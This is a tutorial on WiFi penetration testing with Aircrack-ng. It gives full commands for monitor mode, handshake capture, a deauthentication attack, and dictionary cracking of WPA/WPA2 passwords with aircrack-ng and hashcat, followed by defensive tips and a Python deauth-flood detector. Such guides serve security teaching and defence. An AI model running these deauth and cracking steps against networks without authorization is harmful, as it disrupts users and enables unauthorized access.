WiFi Hacking Using Aircrack-ng

 


WiFi Pentesting Using Aircrack-ng

Introduction

WiFi penetration testing is an essential skill for ethical hackers and cybersecurity professionals. Aircrack-ng is one of the most popular tools used for testing WiFi security by capturing and cracking WPA/WPA2 passwords. This guide will walk you through the process of WiFi penetration testing using Aircrack-ng.

Disclaimer: This tutorial is for educational purposes only. Testing networks without permission is illegal.


Prerequisites

Before starting, ensure you have:

  • A Linux-based OS (Kali Linux, Parrot OS, or Ubuntu with Aircrack-ng installed).
  • A WiFi adapter that supports monitor mode and packet injection (e.g., Alfa AWUS036NHA, TP-Link TL-WN722N v1).
  • Basic knowledge of Linux commands and networking.

Step 1: Install Aircrack-ng

If you don’t have it installed, run:

sudo apt update && sudo apt install aircrack-ng

Verify installation:

aircrack-ng --help

Step 2: Enable Monitor Mode

First, list all network interfaces:

sudo airmon-ng

Put your WiFi adapter into monitor mode:

sudo airmon-ng start wlan0

Check if monitor mode is enabled:

sudo iwconfig

Your WiFi interface should now be listed in monitor mode, typically under the name wlan0mon.


Step 3: Scan for Available Networks

Start scanning for WiFi networks:

sudo airodump-ng wlan0mon

This will display:

  • BSSID (MAC address of the router)
  • Channel (CH)
  • Encryption type (WPA/WPA2/WEP)
  • Signal strength (PWR)

Step 4: Capture Handshake (WPA/WPA2)

Focus on a specific network using:

sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon

Replace:

  • <channel> with the WiFi channel.
  • <BSSID> with the target’s MAC address.

Now wait for a WPA handshake to be captured. If no clients are connecting, run a deauthentication attack to speed up the process:

sudo aireplay-ng -0 10 -a <BSSID> wlan0mon

Once the handshake is captured, you will see a [ WPA handshake: BSSID ] message.


Step 5: Crack the WiFi Password

Use a wordlist (like rockyou.txt) to run a dictionary attack against the handshake:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture-01.cap

If the password is in the wordlist, Aircrack-ng will crack it.

Alternative: Using Hashcat for Faster Cracking

Convert the capture file to hccapx format:

sudo aircrack-ng capture-01.cap -j capture

Then use Hashcat with GPU:

hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt --force

Defending Against WiFi Attacks

To protect your WiFi network:

  • Use a Strong Password – At least 12 characters, including symbols, and not a word or phrase found in common wordlists such as rockyou.txt.
  • Disable WPS – WPS is vulnerable to brute-force attacks.
  • Enable MAC Filtering – Allow only trusted MAC addresses. MAC addresses can be spoofed, so treat this as a minor hurdle rather than a primary control.
  • Use WPA3 Encryption – If your router supports it.
  • Monitor for Rogue Devices – Regularly check connected devices.
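
A defensive counterpart to the deauthentication step in Step 4, added here as an example (it is not code from the original guide): it parses raw 802.11 management frames and flags a BSSID when deauthentication or disassociation frames arrive faster than a threshold. The frame bytes, MAC addresses, threshold and window are constructed assumptions; a real sensor would feed it frames from a monitor-mode capture with the radiotap header removed.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0xC0, 0xA0  # first frame-control byte: management type, subtype 12 / 10

def parse_mgmt(frame: bytes):
    """Parse an 802.11 frame (radiotap header already stripped).
    Returns (kind, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26 or frame[0] not in (DEAUTH, DISASSOC):
        return None  # need the 24-byte MAC header plus the 2-byte reason code
    kind = "deauth" if frame[0] == DEAUTH else "disassoc"
    dst, src, bssid = (frame[o:o + 6].hex(":") for o in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, 24)
    return kind, dst, src, bssid, reason

def detect_floods(events, threshold=20, window=5.0):
    """events: time-sorted (timestamp_seconds, raw_frame) pairs.
    Returns [(bssid, alert_time, frames_in_window)], one entry per flooded BSSID.
    threshold and window are assumed starting values; tune them per site."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in events:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        bssid, seen = parsed[3], recent[parsed[3]]
        seen.append(ts)
        while ts - seen[0] > window:  # drop frames older than the window
            seen.popleft()
        if len(seen) >= threshold and bssid not in alerts:
            alerts[bssid] = (ts, len(seen))
    return [(b, t, n) for b, (t, n) in alerts.items()]

def build(fc0, dst, src, bssid, reason=0):
    """Build a constructed test frame: FC, duration, 3 addresses, seq-ctl, reason."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc0, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample traffic (locally administered MACs, not real devices).
AP_A, AP_B, STA, BCAST = ("02:00:00:00:00:01", "02:00:00:00:00:02",
                          "02:00:00:00:00:bb", "ff:ff:ff:ff:ff:ff")
SAMPLE = [(0.0, build(0x80, BCAST, AP_A, AP_A)),            # beacon-type frame: ignored
          (1.0, build(DEAUTH, AP_B, STA, AP_B, reason=3))]  # one client leaving: normal
SAMPLE += [(10.0 + i * 0.05, build(DEAUTH, BCAST, AP_A, AP_A, reason=7))
           for i in range(40)]                              # burst claiming to come from AP_A

if __name__ == "__main__":
    for bssid, t, n in detect_floods(SAMPLE):
        print(f"deauth flood on {bssid}: {n} frames within 5s at t={t:.2f}")
```

Protected Management Frames (802.11w, required by WPA3) make clients reject forged deauthentication frames, so an alert from this check is a prompt to confirm that PMF is enabled on the affected network.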

Conclusion

Aircrack-ng is a powerful tool for ethical hacking and WiFi penetration testing. By following this guide, you’ve learned how to capture handshakes, perform deauthentication attacks, and crack passwords. Always use this knowledge responsibly and ethically.
